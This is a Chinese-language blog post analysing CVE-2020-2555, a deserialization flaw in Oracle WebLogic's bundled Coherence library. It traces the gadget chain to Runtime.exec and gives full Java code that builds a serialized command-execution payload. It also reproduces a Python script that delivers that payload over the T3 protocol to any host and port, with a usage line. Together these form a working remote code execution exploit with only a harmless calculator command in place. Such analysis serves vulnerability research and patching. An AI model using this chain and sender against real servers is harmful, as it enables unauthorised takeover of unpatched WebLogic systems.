WebLogic CVE-2020-2555分析

已于 2022-04-01 11:37:26 修改
阅读量3.5k 收藏
点赞数
分类专栏: java安全 代码审计 文章标签: java web安全 安全漏洞 网络安全 中间件
于 2021-12-10 16:24:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/121859288
版权

WebLogic CVE-2020-2555分析

WebLogic 是一个基于 JAVAEE 架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用,类比于 Tomcat

Oracle Coherence为Oracle融合中间件中的产品,在WebLogic 12c及以上版本中默认集成到WebLogic安装包中,而 Coherence 存在一条反序列化链!

WebLogic 安装参考:

https://blog.csdn.net/csdn_wangchen/article/details/100533923

环境:

新建一个项目导入 coherence.jar 依赖即可,或者直接用 Y4 师傅在 GitHub 上的环境

漏洞分析

调用链如下:

 * gadget:
 *      BadAttributeValueExpException.readObject()
 *          com.tangosol.util.filter.LimitFilter.toString()
 *              com.tangosol.util.extractor.ChainedExtractor.extract()
 *                  com.tangosol.util.extractor.ReflectionExtractor.extract()
 *                      Method.invoke()
 *                      ...
 *                      Runtime.getRuntime.exec()

看到 com.tangosol.util.extractor.ReflectionExtractor#extract 方法,存在动态方法执行操作,通过 findMethod 反射获取 oTarget 对象指定参数的方法,然后执行该方法,clz、m_sMethod、m_aoParam 可控,可以执行任何方法
image-20211210154425099
如下一个例子,调用 extract 方法会先通过 findMethod 反射获取到 Runtime.getMethod 方法,然后执行,返回一个 Runtime.getRuntime 的Method实例

import com.tangosol.util.extractor.ReflectionExtractor;
import java.lang.reflect.Method;

public class POC {
    public static void main(String[] args) throws Exception {
        ReflectionExtractor refle = new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]});
        Method me = (Method) refle.extract(Runtime.class);
        Runtime invoke = (Runtime) me.invoke(null, null);
        invoke.exec("calc");
    }
}

看到 com.tangosol.util.extractor.ChainedExtractor#extract 方法,存在一组 extract 方法调用,跟ACC链的 transform 调用无比类似!把 extract 方法执行返回的结果带入下一次 extract 方法调用的参数
image-20211210155340525
再看到 com.tangosol.util.filter.LimitFilter#toString 方法,其调用了 extract 方法,让 m_comparator 属性为 ChainedExtractor 对象即可,且 ChainedExtractor 是实现了 ValueExtractor 接口的!
image-20211210155601964
最后看到 BadAttributeValueExpException#readObject 方法,调过ACC链的师傅应该对这个类很熟悉,其中的 readObject 方法可以调用任何的类的 toString 方法
image-20211210155722191
最终可以构造如下POC:

import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import com.tangosol.util.filter.LimitFilter;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;

public class Poc {
    public static void main(String[] args) throws Exception{
        ReflectionExtractor[] refle = new ReflectionExtractor[]{
                new ReflectionExtractor("getMethod",new Object[]{"getRuntime",new Class[0]}),
                new ReflectionExtractor("invoke",new Object[]{null,new Class[0]}),
                new ReflectionExtractor("exec",new Object[]{new String[]{"cmd","/c","calc"}})
        };
        ChainedExtractor chainedExtractor = new ChainedExtractor(refle);
        LimitFilter limitFilter = new LimitFilter();
        limitFilter.setComparator(chainedExtractor);
        limitFilter.setTopAnchor(Runtime.class);
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        Field val = badAttributeValueExpException.getClass().getDeclaredField("val");
        val.setAccessible(true);
        val.set(badAttributeValueExpException,limitFilter);
        FileOutputStream fileOutputStream = new FileOutputStream("POC.ser");
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
        objectOutputStream.writeObject(badAttributeValueExpException);
        objectOutputStream.flush();
        objectOutputStream.close();
        FileInputStream fileInputStream = new FileInputStream("POC.ser");
        ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream);
        objectInputStream.readObject();
    }
}

T3协议反序列化

现在反序列化链是有了,入口点呢?参考 http://drops.xmd5.com/static/drops/web-13470.html 文章

  1. 第一个数据包先向 WebLogic 服务器发送T3的协议头
  2. 第二个数据包向 WebLogic 服务器发送 JAVA序列化数据,其中恶意的序列化数据与第一部分序列化数据进行拼接

借用 zpchcbd 师傅的脚本:

# author: zpchcbd
import socket
import os
import sys
import struct
from binascii import a2b_hex, b2a_hex

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)

server_address = (sys.argv[1], int(sys.argv[2]))
print('[+] Connecting to {} port {}'.format(server_address[0], server_address[1]))
sock.connect(server_address)

# Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print('sending "{}"'.format(headers))
sock.sendall(headers.encode())

data = sock.recv(1024)
print('[+] received "%s"' % data)

payloadObj = open(sys.argv[3],'rb').read()
payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
payload=payload+str(b2a_hex(payloadObj).decode())
payload=payload+'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
payload = '%s%s' % (('{:08x}'.format(len(payload) // 2 + 4), payload))

print('[+] Sending payload...')
sock.send(bytes.fromhex(payload))
data = sock.recv(1024)
print('received "%s"' % data)

用法 python3 weblogic.py 192.168.43.79 7001 POC.ser

总结

因为在WebLogic 12c及以上版本中内嵌Coherence,而 Coherence 又存在反序列化链,再者 WebLogic 的T3协议可以触发反序列化,最终导致反序列化漏洞!

需要注意的一个地方是生成 Payload 所用环境的 coherence.jar 版本要和目标的 coherence.jar 版本一致,否则会出现 serialVersionUID 不一致的问题

影响版本:

Oracle weblogic 12.1.3.0.0/12.2.1.1.0/12.2.1.2.0/12.2.1.3.0,而在 12.2.1.4.0 版本中虽然也内嵌了 Coherence,但是该版本默认没启用 Coherence,所以其未在影响版本内!

Reference:

https://www.cnblogs.com/zpchcbd/p/15629063.html
https://blog.csdn.net/qq_30302577/article/details/105244508
https://y4er.com/post/weblogic-cve-2020-2555/

0x6b79
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Weblogic12c T3 协议安全漏洞分析CVE-2020-14645 && CVE-2020-2883 && CVE-2020-14645】
weixin_45694388的博客
10-02 2052
前言 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件。 主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 近几年频繁爆发出多个RCE漏洞,而在今年,其T3协议被频繁攻击和发布补丁与绕过,本文主要对今年来由T3协议入口所产生的多个RCE漏洞进行分析,其中主要包括CVE-2020-2555CVE-2020-2883(bypass CVE-2020-2555补丁)、 CVE-2020
CVE2020-2555漏洞分析
weixin_45540609的博客
08-05 2125
一、简介 Oracle Coherence为Oracle融合中间件中的产品,在WebLogic 12c及以上版本中默认集成到WebLogic安装包中,T3是用于在WebLogic服务器和其他类型的Java程序之间传输信息的协议。 weblogic反序列化远程命令执行漏洞(CVE-2020-2555),Oracle Fusion中间件Oracle Coherence存在缺陷,攻击者可利用该漏洞再未授权情况下通过构造T3协议请求,获取weblogic服务器权限,执行任意命令。 漏洞影响情况: Oracl
漫谈-Weblogic-CVE-2020-2555
Ms08067安全实验室
05-01 4689
背景 2020年1月,互联网上爆出了weblogic反序列化远程命令执行漏洞(CVE-2020-2555),Oracle Fusion中间件Oracle Coherence存在缺...
漏洞复现:WebLogic反序列化远程代码执行漏洞(cve-2020-2555)
HCIEMAYU的博客
07-17 276
WebLogic是Oracle推出的application server,是Web应用系统必不可少的组件,其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性强、快速开发等多种特性。大多数未及时更新的Weblogic组件存在严重的漏洞,导致其成为攻击者攻击的重点目标。,将java版本切换至jdk1.8(如果切换不成功,用root权限尝试切换一下试试)配置页面中,进入安全选项卡页面,点击筛选器,配置筛选器。4、输入URL,回显选择FileOutputStream,进行漏洞验证。
weblogic反序列化之CVE-2020-2555漏洞分析
weixin_45682070的博客
03-18 4635
前言 CVE-2020-2555主要源于在coherence.jar存在着用于gadget构造的类(反序列化构造类),并且利用weblogic默认存在的T3协议进行传输和解析进而导致weblogic服务器反序列化恶意代码最后执行攻击语句。 Oracle Coherence组件默认集成在Weblogic12c及以上版本中。 ...
WebLogic CVE-2021-2394 RCE 漏洞分析
HBohan的博客
07-26 2577
漏洞简述 2021年3月15日墨云安全V-Lab实验室向Oracle官方报告了Weblogic Server RCE漏洞,2021年7月21日Oracle发布了致谢信息。 这是一个二次反序列化漏洞,是cve-2020-14756和cve-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。 漏洞分析 最开始我是发现了oracle.eclipselink.coherence.integrated.internal.cache.SerializationHelper类中的re.
CVE-2020-2555-weblogic复现
Amdy_amdy的博客
04-14 2566
测试环境:centos6.5+weblogic12.2.1.4 攻击机:windows 10 脚本:https://github.com/wsfengfan/CVE-2020-2555 github上大佬的脚本 漏洞介绍: 一、漏洞简介 该反序列化的gadget存在与coherence包中。具体可以见分析 构造chain类似于common-collection的chain,可以照葫芦画...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE_2020_2546:CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3有效负载利用poc python3,
03-20
1,Weblogic RCE漏洞利用CVE_2020_2546 CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic RCE T3有效载荷利用POC python3 2,利用GIOP +发送绑定(CVE-2020-2555,...
WebLogic CVE-2019-2725补丁.zip
07-16
weblogic反序列化补丁包
Weblogic-CVE-2019-2725补丁升级方法.docx
11-08
Weblogic-CVE-2019-2725补丁升级方法详解》 WebLogic Server是一款由甲骨文公司开发的企业级应用服务器,它为构建、部署和管理企业级Java应用程序提供了全面的平台。然而,随着技术的发展,安全漏洞的出现是不可...
weblogic-cve_2020_2555漏洞复现
0day
01-28 1848
weblogic-cve_2020_2555漏洞复现 漏洞概述: 该漏洞于2020年1月在网上爆出,属于weblogic反序列化漏洞,漏洞原因是Oracle Fusion中间件 Oracle Coherence 存在缺陷,攻击者可利用该漏洞在未经授权下通过构造T3协议请求,获取 Weblogic 服务器权限,执行任意命令。 漏洞复现: Vulfocus平台拉取下载启动漏洞镜像环境: 访问漏洞环境地址端口11317,该端口映射在weblogic的服务端口7001,在url地址栏输入ip端口后添加
漫谈 Weblogic CVE-2020-2555
whatday的专栏
07-09 741
背景 在2020年1月,互联网上爆出了Weblogic反序列化远程命令执行漏洞(CVE-2020-2555),Oracle Fusion中间件 Oracle Coherence 存在缺陷,攻击者可利用该漏洞在未经授权下通过构造T3协议请求,获取 Weblogic 服务器权限,执行任意命令,风险较大。 漏洞信息曝光之后,互联网中发布几篇该漏洞相关的分析文章以及利用 POC,但公布的 POC 有部分不足之处,导致漏洞检测效率变低,不足之处主要体现在: 1 目前所有的利用工具都是通过动态编译进行生产 POC
oracle cve 漏洞,CVE-2020-2555:Oracle WebLogic RCE漏洞分析
weixin_42639246的博客
04-04 528
写在前面的话在对Java Web应用程序进行研究时,不安全的反序列化漏洞现在已经成为了攻击者或研究人员的常见目标了。这些漏洞将导致他人在目标设备上可靠地实现远程代码执行,而且这类漏洞通常很难修复。在这篇文章中,我们将对漏洞CVE-2020-2555(ZDI-20-128)进行分析。这是一个严重漏洞,CVSS评分为9.8,该漏洞将影响Oracle Coherence库,而这个库在Oracle Web...
Weblogic-CVE-2020-2555复现(VirtualBox虚拟机搭建)
weixin_43061533的博客
11-17 966
weblogic-cve_2020_2555复现 安装环境 靶机:一台Windows 2008 R2 服务器 攻击机:Win 10 配置环境 Jdk1.8.0_221 Weblogic 12.2.1.4.0 下载地址https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html 链接:https://pan.baidu.com/s/12Tt4Y7sXoht0RJD03f25bQ 提取码:1234 1.安装 【代码1
通过weblogic报错页面发现版本_WebLogic CVE-2018-2628漏洞 修复说明手册
weixin_39664995的博客
12-18 627
事件概要:北京时间4月18日凌晨,Oracle官方发布了4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),通过该漏洞,攻击者可以在未授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以获取目标服务器的权限。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。BUG 描述此...
12. Hibernate 模板设计模式
最新发布
这是一个web全栈开发的博客,取其精华去其糟粕,争取让大家一看就懂,一学就会,一用就成~
07-22 745
如何运用模板设计模式重构 Hibernate 操作流程;持久化对象与序列化接口;OOP中有一个编码原则 :写仅写一次。翻译过来就是,不要重复,要重用。答案是:使用模板设计模式进一步封装Hibernate的操作。在真实项目中,Hibernate仅仅只是完成项目中的一部分工作,需要和其它,如Spring等框架联合工作,一起承担整体项目的开发。Spring框架中就提供的有Hibernate模板对象。一个常规的、频繁的操作代码中,大部分代码不需要变动,只有小部分代码需要根据需求变动。
weblogic-cve-2020-25516
07-25
C知道: 对于您提到的Weblogic漏洞CVE-2020-25516,这是一个已经被公开披露的漏洞,它影响了Oracle WebLogic Server的某些版本。 具体来说,这个漏洞是由于WebLogic Server管理控制台的不当权限验证机制所导致的。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值